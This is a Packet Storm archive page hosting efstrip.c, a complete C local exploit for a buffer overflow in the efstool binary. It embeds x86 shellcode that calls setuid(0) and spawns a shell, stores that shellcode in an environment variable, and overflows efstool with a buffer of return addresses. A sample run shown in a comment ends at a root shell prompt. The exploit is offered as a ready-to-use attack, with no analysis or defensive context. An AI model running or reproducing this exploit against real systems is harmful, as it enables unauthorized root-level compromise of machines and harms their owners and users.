exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

efstrip.c

efstrip.c
Posted Jan 5, 2003
Authored by Hi_Tech_Asslemon

Efstrip is an exploit for the efstool vulnerability. Unlike other exploits for this vulnerability, Efstrip is robust, doesn't need a wide range of attack options, and doesn't need brute forcing. It actually ./works.

tags | exploit
SHA-256 | a0fa492bfaf986c0a0bcba194d566ba90078b5c1cf124df1293a16b9fb3336b6

efstrip.c

Change Mirror Download
/* EFStool local exploit 
* (no brute force capabilities..cuz its umm..*local*)
*
* e-mail: Hi_Tech_Asslemon@hairdresser.net
*
* coded by: Hi_Tech_Asslemon
*/
/*
$ ./efstrip
EFStrip -- ./go efstool exploit -- coded by: Hi_Tech_Asslemon

Shellcode at: 0xbfffffbd (omfg it's magic@!@!@!)
sh-2.05#
*/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>

#define PATH "/opt/gnome/bin/efstool"
unsigned char code[] =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xc0\x50\x50\x50\x68\x6e"
"\x2f\x73\x68\x68\x2f\x2f\x62\x69\x54\x5b\x89\xe1\x31\xd2\xb0"
"\x0c\x01\xc1\x89\x19\xfe\xc8\xcd\x80";
extern char **environ;

int
main(int argc, char **argv)
{
unsigned long ret;
unsigned char *p;
unsigned char *run[3];
unsigned char buf[3000]; /* tnx str9 */
unsigned int i;

p=NULL;
if((p=getenv("FOO"))==NULL)
{
if(setenv("FOO",code,1)==-1) exit(1);
if(execve(argv[0],argv,environ)) exit(1);
}
printf("EFStrip -- ./go efstool exploit -- coded by: Hi_Tech_Asslemon\n\n");
ret=(long)p;
ret+=(strlen(argv[0])-strlen(PATH));
printf("Shellcode at: %p (omfg it's magic@!@!@!)\n",ret);
for(i=0;i<sizeof(buf);i+=4) *(long *)&buf[i]=ret;
run[0]=PATH;
run[1]=buf;
run[2]=NULL;
if(execve(run[0],(char **)run,environ))
{
printf("failed\n");
exit(1);
}
}



Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    20 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    17 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close